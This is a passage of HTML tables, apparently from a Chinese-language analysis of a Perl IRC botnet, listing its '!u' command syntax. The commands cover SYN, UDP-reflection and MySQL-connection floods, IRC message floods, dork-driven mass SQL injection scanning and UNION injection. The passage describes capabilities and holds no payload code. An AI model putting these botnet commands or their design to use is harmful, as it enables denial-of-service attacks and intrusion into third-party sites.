style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sqlflood</span></span></p></td><td data-colwidth="184" width="184" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u sqlflood &lt;host&gt; &lt;time&gt;</span></span></p></td><td data-colwidth="105" width="105" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">MySQL</span></span></p></td><td data-colwidth="426" width="426" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">IO::Socket::INET-&gt;new(PeerPort=&gt;3306)</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">循环连接</span></font></span></p></td></tr><tr><td data-colwidth="135" width="135" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">syn</span></span></p></td><td data-colwidth="184" width="184" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u syn &lt;dstip&gt; &lt;dstport&gt; &lt;time&gt;</span></span></p></td><td data-colwidth="105" width="105" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">TCP SYN</span></span></p></td><td data-colwidth="426" width="426" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">编译的</span></font></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">./syn</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">C程序 (需先 install-syn)</span></span></p></td></tr><tr><td data-colwidth="135" width="135" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">sudp</span></span></p></td><td data-colwidth="184" width="184" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u sudp &lt;host&gt; &lt;port&gt; &lt;refl&gt; &lt;thr&gt; &lt;time&gt;</span></span></p></td><td data-colwidth="105" width="105" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">UDP</span></span></p></td><td data-colwidth="426" width="426" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;page-break-after:avoid;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">编译的</span></font></span><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">./50x</span></span><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">C程序 (需先 install-50x)</span></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">IRC 洪水命令</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="265" width="265" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">命令</span></font></span></b></p></td><td data-colwidth="95" width="95" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">目标</span></font></span></b></p></td><td data-colwidth="491" width="491" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">方式</span></font></span></b></p></td></tr><tr><td data-colwidth="265" width="265" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u msgflood &lt;who&gt;</span></span></p></td><td data-colwidth="95" width="95" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">用户</span></font></span></p></td><td data-colwidth="491" width="491" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">10次 PRIVMSG</span></span></p></td></tr><tr><td data-colwidth="265" width="265" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u dunixflood &lt;who&gt;</span></span></p></td><td data-colwidth="95" width="95" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">用户</span></font></span></p></td><td data-colwidth="491" width="491" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">10次 DUNIX CHAT CTCP</span></span></p></td></tr><tr><td data-colwidth="265" width="265" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u ctcpflood &lt;who&gt;</span></span></p></td><td data-colwidth="95" width="95" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">用户</span></font></span></p></td><td data-colwidth="491" width="491" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">20次 CTCP VERSION+PING</span></span></p></td></tr><tr><td data-colwidth="265" width="265" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u noticeflood &lt;who&gt;</span></span></p></td><td data-colwidth="95" width="95" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">用户</span></font></span></p></td><td data-colwidth="491" width="491" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">10次 NOTICE</span></span></p></td></tr><tr><td data-colwidth="265" width="265" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u channelflood</span></span></p></td><td data-colwidth="95" width="95" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">频道</span></font></span></p></td><td data-colwidth="491" width="491" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">25次 JOIN 随机频道</span></span></p></td></tr><tr><td data-colwidth="265" width="265" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;mso-hansi-font-family:var(--monospace);mso-bidi-font-family:var(--monospace);font-size:12.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u maxiflood &lt;who&gt;</span></span></p></td><td data-colwidth="95" width="95" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">用户</span></font></span></p></td><td data-colwidth="491" width="491" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:宋体;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">60次 混合 (NOTICE+CTCP+PRIVMSG)</span></span></p></td></tr></tbody></table><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><span textstyle="" style="font-weight: bold;">漏洞扫描/攻击命令</span></span></p><table style="border-collapse:collapse;width:426.1000pt;border:none;mso-border-left-alt:0.5000pt solid rgb(223,226,229);mso-border-top-alt:0.5000pt solid rgb(223,226,229);mso-border-right-alt:0.5000pt solid rgb(223,226,229);mso-border-bottom-alt:0.5000pt solid rgb(223,226,229);mso-padding-alt:0.0000pt 0.0000pt 0.0000pt 0.0000pt;"><tbody><tr><td data-colwidth="379" width="379" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium;border-style: solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">命令</span></font></span></b></p></td><td data-colwidth="473" width="473" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt medium medium;border-style: solid solid none none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) currentcolor currentcolor;"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><b><span style="font-family:宋体;font-weight:bold;font-size:12.0000pt;mso-font-kerning:0.0000pt;"><font face="宋体"><span leaf="">功能</span></font></span></b></p></td></tr><tr><td data-colwidth="379" width="379" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt;border-style: solid;border-color: rgb(223, 226, 229);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u multiscan &lt;vuln&gt; &lt;dork&gt;</span></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding: 3.6pt 7.8pt;border-width: 1pt 1pt 1pt medium;border-style: solid solid solid none;border-color: rgb(223, 226, 229) rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><span leaf="">14个搜索引擎联合 Dork </span><font face="宋体"><span leaf="">→ </span></font><font face="var(--monospace)"><span leaf="">SQL注入批量扫描</span></font></span></p></td></tr><tr><td data-colwidth="379" width="379" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);background: rgb(248, 248, 248);"><p style="text-align:center;margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;"><span style="font-family:var(--monospace);font-size:9.0000pt;mso-font-kerning:0.0000pt;background:rgb(243,244,244);mso-shading:rgb(243,244,244);"><span leaf="">!u sql &lt;url&gt; &lt;columns&gt;</span></span></p></td><td data-colwidth="473" width="473" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt medium;border-style: none solid solid none;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229) currentcolor;background: rgb(248, 248, 248);"><p style="margin-top:0.0000pt;margin-right:0.0000pt;margin-bottom:0.0000pt;margin-left:0.0000pt;mso-para-margin-right:0.0000gd;mso-para-margin-left:0.0000gd;text-indent:0.0000pt;mso-char-indent-count:0.0000;layout-grid-mode:char;mso-pagination:widow-orphan;text-align:left;"><span style="font-family:var(--monospace);mso-hansi-font-family:宋体;mso-bidi-font-family:宋体;font-size:9.0000pt;mso-font-kerning:0.0000pt;"><font face="var(--monospace)"><span leaf="">单</span></font><span leaf="">URL UNION注入检测</span></span></p></td></tr><tr><td data-colwidth="379" width="379" valign="center" style="padding: 3.6pt 7.8pt;border-width: medium 1pt 1pt;border-style: none solid solid;border-color: currentcolor rgb(223, 226, 229) rgb(223, 226, 229);"><p 